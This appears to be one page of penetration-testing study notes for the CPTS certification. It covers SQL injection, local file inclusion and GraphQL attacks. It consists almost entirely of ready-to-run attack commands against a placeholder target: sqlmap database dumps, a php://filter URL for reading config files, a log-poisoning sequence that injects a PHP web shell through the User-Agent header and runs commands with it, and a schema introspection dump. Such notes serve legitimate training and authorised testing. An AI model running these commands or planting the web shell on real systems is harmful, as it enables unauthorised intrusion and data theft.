Web Application Exploitation & Injection
Core web exploitation vectors: SQL Injection, Local File Inclusion to RCE, JWT manipulation, and GraphQL introspection.
sqlmapcurlhashcatburpsuite
Always verify database technology and backend language before launching automated tools to prevent denial-of-service.
1. Automated SQL Injection with SQLmap
Extract databases using risk and level heuristics:
sqlmap -u "http://{TARGET_IP}/item.php?id=1" --batch --random-agent --level=3 --risk=2 --dbs
Target saved HTTP request from Burp Suite:
sqlmap -r request.txt -p username --batch --current-db --dump
2. Local File Inclusion (LFI) & Log Poisoning
Read source code via PHP wrapper:
http://{TARGET_IP}/index.php?page=php://filter/convert.base64-encode/resource=config.php
Poison Apache access log via User-Agent header:
curl -s -A "<?php system($_GET['cmd']); ?>" http://{TARGET_IP}/
curl "http://{TARGET_IP}/index.php?page=/var/log/apache2/access.log&cmd=id"
3. GraphQL Introspection
Dump all schema types and query fields:
curl -s -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name,fields{name}}}}"}' http://{TARGET_IP}/graphql | jq .
Once a reverse shell is obtained, stabilize your terminal immediately using 12. Interactive TTY Stabilization & Terminal Spawning before escalating privileges via 04. Linux Privilege Escalation Master Guide.
More CPTS notes
- 01. Network Discovery & Port Scanning Guide
- 02. Web Content Discovery & Directory Fuzzing
- 04. Linux Privilege Escalation Master Guide
- 05. Windows Local Privilege Escalation & LOLBAS
- 06. Active Directory Attack Paths & Domain Enumeration
- 07. Kerberos Exploitation: AS-REP & Kerberoasting
- 08. Active Directory Certificate Services (AD CS) Abuse
- 09. Pivoting, Tunnels & Lateral Movement
- 10. Password Cracking & Hash Identification
- 11. Offensive File Transfers Across Restricted Networks
- 12. Interactive TTY Stabilization & Terminal Spawning
Keep these notes in your own private vault. Open CPTS notes in ZeroBox